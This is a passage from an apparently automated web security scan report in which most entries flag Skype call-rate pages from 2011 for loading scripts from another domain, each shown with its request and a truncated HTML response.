Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.667. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-canada  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-canada

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-canada HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.668. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cape-verde  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cape-verde

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cape-verde HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.669. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cayman-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cayman-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cayman-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.670. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-central-african-republic  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-central-african-republic

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-central-african-republic HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.671. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-chad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-chad HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.672. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-chile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-chile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-chile HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.673. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-china

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-china HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.674. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-china-hong-kong-s.a.r.  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-china-hong-kong-s.a.r.

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-china-hong-kong-s.a.r. HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:23 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.675. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-colombia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-colombia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-colombia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 49717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.676. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-comoros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-comoros

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-comoros HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.677. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-congo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-congo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-congo HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:43 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.678. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cook-islands  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cook-islands

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cook-islands HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:44 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.679. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-costa-rica  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-costa-rica

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-costa-rica HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.680. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-cote-divoire  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-cote-divoire

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-cote-divoire HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/skype-common.js" type="text/javascript" charset="utf-8"></script>
   

               <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>
   

   <!-- Template specific javascripts -->
   <script src="http://www.skypeassets.com/i/js/jquery/prices.js" type="text/javascript" charset="utf-8"></script>
   <script src="http://www.skypeassets.com/i/js/subscriptions_new.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/upgrade-annoyance.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.681. http://www.skype.com/intl/en-us/prices/call-rates/cheap-calls-to-croatia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/prices/call-rates/cheap-calls-to-croatia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/prices/call-rates/cheap-calls-to-croatia HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:38:45 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 48738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" >
<head>
   
   <ti
...[SNIP]...
</script>
   <script src="http://www.skypeassets.com/i/js/jquery/complete.js" type="text/javascript" charset="utf-8"></script>
